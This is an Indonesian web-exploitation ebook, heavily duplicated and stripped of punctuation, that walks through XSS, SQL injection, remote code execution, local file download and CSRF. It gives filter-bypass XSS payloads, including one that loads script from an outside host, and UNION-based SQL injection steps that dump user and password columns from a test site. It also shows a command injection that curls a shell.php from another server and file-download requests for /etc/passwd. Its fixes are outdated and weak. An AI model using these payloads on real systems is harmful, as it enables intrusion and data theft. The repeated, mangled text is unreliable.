Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 6: Basic Web Exploit Development

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 7: Basic Web Exploit Development

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

